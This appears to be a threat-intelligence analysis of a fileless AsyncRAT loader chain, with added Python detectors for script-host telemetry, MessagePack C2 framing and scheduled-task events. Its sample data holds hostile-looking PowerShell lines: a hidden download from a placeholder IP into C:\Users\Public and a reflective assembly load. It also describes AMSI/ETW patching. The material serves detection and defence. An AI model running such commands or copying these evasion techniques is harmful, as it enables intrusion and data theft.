Fileless malware has become a formidable adversary for security teams, operating entirely in memory and evading disk-based detection.
A recent incident demonstrates how attackers leveraged a multi-stage fileless loader to deploy AsyncRAT, a powerful Remote Access Trojan (RAT), through legitimate system tools—leaving almost no footprint on disk.
This case study highlights critical techniques for persistence, evasion, and control, underscoring the urgent need for advanced behavioral monitoring and memory-forensic capabilities.
The intrusion began when a valid but compromised ScreenConnect client gave the attacker interactive access. By connecting through the malicious relay domain relay.shipperzone[.]online, the threat actor gained remote control over the target endpoint.
Once inside, they executed a VBScript (Update.vbs) with WScript, which immediately launched a PowerShell command to fetch two additional payloads, logs.ldk and logs.ldr, from a remote server.
Both files were silently written to the C:\Users\Public directory, but instead of executing them from disk, the script read logs.ldk into a byte array and loaded logs.ldr directly into memory via reflection.
The script then retrieved encoded data over HTTP, decoded it on the fly, and dynamically invoked methods in the resulting .NET assembly.
Because no executable was ever dropped and run from disk (only the script and the two non-executable payload files touched the file system), file-scanning, signature-based antivirus had nothing to match, and the adversary bypassed it.
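The chain above (a script host spawning PowerShell, payloads staged under C:\Users\Public, a reflective assembly load from a byte array) is exactly the behaviour the Defensive Measures below ask teams to watch for. The following Python triage routine is an added example, not code from the report or from LevelBlue; it runs three rules over constructed telemetry records. The record field names, the placeholder IP 198.51.100.7 and the command lines are assumptions made for this example.

```python
import re

# Process-creation parents that should rarely launch PowerShell directly.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Reflective load of a .NET assembly from a byte array instead of a path.
REFLECTIVE_LOAD = re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load\s*\(", re.I)
# Download primitives commonly used to pull a second stage.
DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer", re.I)
# World-writable staging directory used in this intrusion.
PUBLIC_DIR = re.compile(r"C:\\Users\\Public\\", re.I)

# Constructed sample telemetry (not taken from the report). Process records
# follow a Sysmon Event ID 1-like shape; the script-block record mimics
# PowerShell Event ID 4104. Field names, IP and command lines are assumptions.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -ep bypass -c "iwr http://198.51.100.7/logs.ldk -OutFile C:\Users\Public\logs.ldk"'},
    {"type": "scriptblock",
     "text": r"$b=[IO.File]::ReadAllBytes('C:\Users\Public\logs.ldk');[System.Reflection.Assembly]::Load($b)"},
    {"type": "process",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (event_index, rule_id, detail) for every rule that fires."""
    findings = []
    for idx, ev in enumerate(events):
        if ev["type"] == "process":
            parent, child = _basename(ev["parent_image"]), _basename(ev["image"])
            if parent in SCRIPT_HOSTS and child in POWERSHELL:
                findings.append((idx, "script_host_spawns_powershell", f"{parent} -> {child}"))
            text = ev["command_line"]
        else:
            text = ev["text"]
        m = REFLECTIVE_LOAD.search(text)
        if m:
            findings.append((idx, "reflective_assembly_load", m.group(0)))
        # A download alone is noisy; a download that lands in Public is not.
        if DOWNLOAD.search(text) and PUBLIC_DIR.search(text):
            findings.append((idx, "download_to_public_dir", text[:80]))
    return findings


def rule_ids(findings):
    return {rule for _, rule, _ in findings}


if __name__ == "__main__":
    for idx, rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {detail}")
```

The rules are deliberately narrow: each one keys on a combination (script host plus PowerShell child, download plus the Public staging directory) rather than on any single token, which keeps false positives from ordinary administration scripts low while still catching each stage of the loader described above.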
Stage 1: Obfuscator.dll – In-Memory Launcher
Once the first-stage payload was resident in memory, it loaded Obfuscator.dll, a .NET assembly that LevelBlue threat researchers analyzed with dnSpy.
Obfuscator.dll serves as the in-memory launcher, orchestrating persistence and defense evasion:
- Entry Class: Initializes the CLR environment without writing files to disk.
- Core Class: Establishes persistence by creating a scheduled task disguised as “Skype Updater,” ensuring the assembly reloads after a system reboot.
- Tafce5 Class: Contains the anti-analysis routines. PatchAMSI() and PatchETW() patch the Antimalware Scan Interface and Event Tracing for Windows in the current process, so in-memory scripts and assemblies are neither scanned nor reported through ETW telemetry.
- Dynamic API resolution: The addresses of the patched functions are looked up at runtime via GetModuleHandle() and GetProcAddress(), keeping their names out of the import table and thwarting static import-table inspection.
This modular design allows the loader to silence critical defenses, maintain stealth, and prepare the environment for the main RAT payload.
Stage 2: AsyncClient.exe
With defenses neutralized, the loader fetched and decrypted AsyncClient.exe, the RAT’s operational core. AsyncClient.exe uses an AES-encrypted configuration and a custom framed protocol to maintain long-term access:
- Configuration Decryption: Embedded Base64-encoded settings are decrypted with AES-256, revealing the C2 endpoint (3osch20[.]duckdns[.]org), persistence flags, the install directory (%AppData%), and a unique hardware ID.
- C2 Communication: A TCP socket maintains a heartbeat and carries commands as 4-byte length-prefixed MessagePack packets, enabling stealthy command dispatch and data exfiltration.
- Reconnaissance: The RAT gathers OS details, privilege levels, antivirus status, active window titles, and browser extensions such as MetaMask and Phantom to map out high-value targets.
- Exfiltration and Keylogging: Captured data—including clipboard contents, credentials, and keystrokes—is encrypted and stored temporarily before being sent to the C2. A Windows hook callback records user input, augmenting the RAT’s reconnaissance capability.
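Because the C2 channel is framed as a 4-byte length prefix followed by a MessagePack object, a network sensor or forensic script can split a reassembled TCP stream into packets and read the command type without any RAT-specific library. The Python below is an added example, not code from the report, from LevelBlue or from the AsyncRAT project: it implements the framing and a minimal MessagePack decoder over a constructed stream. The little-endian prefix (the order .NET's BitConverter produces on x86/x64 hosts) and the “Packet”/“HWID” key names (the convention of the public AsyncRAT client source) are assumptions; the report does not state them, and the values are made up.

```python
MAX_FRAME = 16 * 1024 * 1024  # sanity bound: a corrupt prefix must not make us buffer forever


def _decode(buf, pos):
    """Decode one MessagePack object at buf[pos]; return (value, new_pos).
    Only the types needed for small string-keyed maps are implemented."""
    b = buf[pos]
    pos += 1
    if b <= 0x7F:                        # positive fixint
        return b, pos
    if 0x80 <= b <= 0x8F:                # fixmap
        return _decode_map(buf, pos, b & 0x0F)
    if 0x90 <= b <= 0x9F:                # fixarray
        items = []
        for _ in range(b & 0x0F):
            v, pos = _decode(buf, pos)
            items.append(v)
        return items, pos
    if 0xA0 <= b <= 0xBF:                # fixstr
        n = b & 0x1F
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if b == 0xC0:
        return None, pos
    if b == 0xC2:
        return False, pos
    if b == 0xC3:
        return True, pos
    if b == 0xC4:                        # bin 8
        n = buf[pos]
        return bytes(buf[pos + 1:pos + 1 + n]), pos + 1 + n
    if b == 0xD9:                        # str 8
        n = buf[pos]
        return buf[pos + 1:pos + 1 + n].decode("utf-8"), pos + 1 + n
    if b == 0xDA:                        # str 16
        n = int.from_bytes(buf[pos:pos + 2], "big")
        return buf[pos + 2:pos + 2 + n].decode("utf-8"), pos + 2 + n
    if b == 0xDE:                        # map 16
        return _decode_map(buf, pos + 2, int.from_bytes(buf[pos:pos + 2], "big"))
    raise ValueError(f"unsupported MessagePack type byte 0x{b:02x} at offset {pos - 1}")


def _decode_map(buf, pos, n):
    out = {}
    for _ in range(n):
        k, pos = _decode(buf, pos)
        v, pos = _decode(buf, pos)
        out[k] = v
    return out, pos


def parse_stream(data):
    """Split a reassembled TCP byte stream into decoded frames.
    Returns (frames, leftover): leftover counts trailing bytes that do not yet
    form a complete frame and must be carried into the next read."""
    frames, pos = [], 0
    while len(data) - pos >= 4:
        length = int.from_bytes(data[pos:pos + 4], "little")  # assumption: BitConverter order
        if length > MAX_FRAME:
            raise ValueError(f"implausible frame length {length} at offset {pos}")
        if len(data) - pos - 4 < length:
            break                                             # partial frame, wait for more
        payload = data[pos + 4:pos + 4 + length]
        value, end = _decode(payload, 0)
        if end != len(payload):
            raise ValueError("trailing bytes inside frame")
        frames.append(value)
        pos += 4 + length
    return frames, len(data) - pos


def packet_types(frames):
    """The 'Packet' field selects the command handler; report it per frame."""
    return [f.get("Packet") if isinstance(f, dict) else None for f in frames]


# --- constructed sample stream (not a real capture) --------------------------
def _fixstr(s):
    return bytes([0xA0 | len(s)]) + s.encode("utf-8")       # strings under 32 bytes


def _fixmap(pairs):
    return bytes([0x80 | len(pairs)]) + b"".join(_fixstr(k) + _fixstr(v) for k, v in pairs)


def _frame(payload):
    return len(payload).to_bytes(4, "little") + payload


SAMPLE_STREAM = (
    _frame(_fixmap([("Packet", "ClientInfo"), ("HWID", "ABCD1234")]))  # check-in
    + _frame(_fixmap([("Packet", "Ping")]))                            # heartbeat
    + b"\x10\x00\x00"   # first three bytes of the next prefix, still in flight
)
```

Treating a partial trailing frame as leftover rather than as an error is what makes the parser usable on live captures, where a frame routinely spans two TCP segments; the MAX_FRAME bound protects the sensor itself from a hostile or corrupted length prefix.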
Persistence is reinforced by recreating scheduled tasks using functions originally found in Obfuscator.dll, ensuring that even if one mechanism fails, a backup remains active.
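The scheduled-task persistence created by the Core class and re-created here is visible to defenders through Security event 4698 (“A scheduled task was created”), whose TaskContent field carries the full task XML. As an added example, not code from the report or from LevelBlue, the Python below parses such an event and flags a task whose vendor-sounding name does not match its action. The task name “Skype Updater” is from the report; the logon trigger, the PowerShell action, its arguments, the benign Adobe control task and the event field layout are assumptions made for this example.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Script hosts and proxy-execution binaries a vendor updater should not need.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}
VENDOR_WORDS = re.compile(r"skype|adobe|google|microsoft|update", re.I)
VENDOR_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")
SUSPICIOUS_ARGS = re.compile(
    r"C:\\Users\\Public\\|Reflection\.Assembly|-enc\w*\s|-w(?:indowstyle)?\s+hidden", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_task_event(event_xml):
    """Parse a Security 4698 event; return the task's action and why it looks suspicious."""
    root = ET.fromstring(event_xml)
    data = {d.get("Name"): (d.text or "") for d in root.iter(f"{EVT_NS}Data")}
    task = ET.fromstring(data["TaskContent"])        # TaskContent holds the escaped task XML
    cmd = (task.findtext(f".//{TASK_NS}Command") or "").strip()
    args = (task.findtext(f".//{TASK_NS}Arguments") or "").strip()
    trig_el = task.find(f"{TASK_NS}Triggers")
    triggers = [] if trig_el is None else [t.tag.replace(TASK_NS, "") for t in trig_el]

    reasons = []
    exe = _basename(cmd)
    if exe in SCRIPT_HOSTS:
        reasons.append(f"action runs script host {exe}")
    if VENDOR_WORDS.search(data.get("TaskName", "")) and not cmd.lower().startswith(VENDOR_ROOTS):
        reasons.append("vendor-lookalike task name but action is outside Program Files")
    if SUSPICIOUS_ARGS.search(args):
        reasons.append("arguments reference a staging dir, reflection, hidden window or encoded command")
    return {"task_name": data.get("TaskName", ""), "command": cmd, "arguments": args,
            "triggers": triggers, "reasons": reasons}


# --- constructed sample events (not real log data) ---------------------------
def make_event(task_name, task_xml):
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f'<System><EventID>4698</EventID></System><EventData>'
            f'<Data Name="SubjectUserName">jdoe</Data>'
            f'<Data Name="TaskName">{escape(task_name)}</Data>'
            f'<Data Name="TaskContent">{escape(task_xml)}</Data>'
            f'</EventData></Event>')


def _task_xml(trigger, command, arguments):
    return (f'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            f'<Triggers><{trigger}><Enabled>true</Enabled></{trigger}></Triggers>'
            f'<Actions Context="Author"><Exec><Command>{escape(command)}</Command>'
            f'<Arguments>{escape(arguments)}</Arguments></Exec></Actions></Task>')


# Task name from the report; trigger, path and arguments are assumptions.
SKYPE_UPDATER_EVENT = make_event(
    r"\Skype Updater",
    _task_xml("LogonTrigger",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"-w hidden -ep bypass -c [Reflection.Assembly]::Load([IO.File]::ReadAllBytes('C:\Users\Public\logs.ldk'))"))

# Benign control: a vendor updater that really does run from Program Files.
ADOBE_EVENT = make_event(
    r"\Adobe Acrobat Update Task",
    _task_xml("LogonTrigger",
              r"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe", ""))


if __name__ == "__main__":
    for ev in (SKYPE_UPDATER_EVENT, ADOBE_EVENT):
        r = assess_task_event(ev)
        print(r["task_name"], r["triggers"], r["reasons"] or "no findings")
```

The same checks apply to the Task Scheduler operational log and to a periodic export of schtasks output, which matters here because the page notes the task is re-created if removed: alerting on creation alone misses the re-registration, so the rule should run on every 4698 and on a scheduled inventory, not only on first sight of the name.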
Defensive Measures
This incident underscores how fileless loaders can weaponize legitimate administration tools to defeat traditional defenses. To counter such threats, organizations should:
- Deploy memory-forensic monitoring to detect anomalous code injection and reflection-based assembly loads.
- Enable behavioral analytics on scripting hosts (PowerShell, WScript) to flag unusual remote payload retrievals.
- Harden endpoint configurations by restricting the creation of scheduled tasks and monitoring task scheduler logs.
- Maintain strict whitelisting policies for remote administration tools such as ScreenConnect, and enforce multi-factor authentication to prevent unauthorized use.
A complete breakdown of the IOCs, full decompiled code snippets, and recommended YARA rules is available in LevelBlue’s full report.
This in-depth analysis equips defenders with the intelligence needed to craft targeted detection signatures, enhance incident response playbooks, and fortify memory-based defenses against evolving fileless malware campaigns.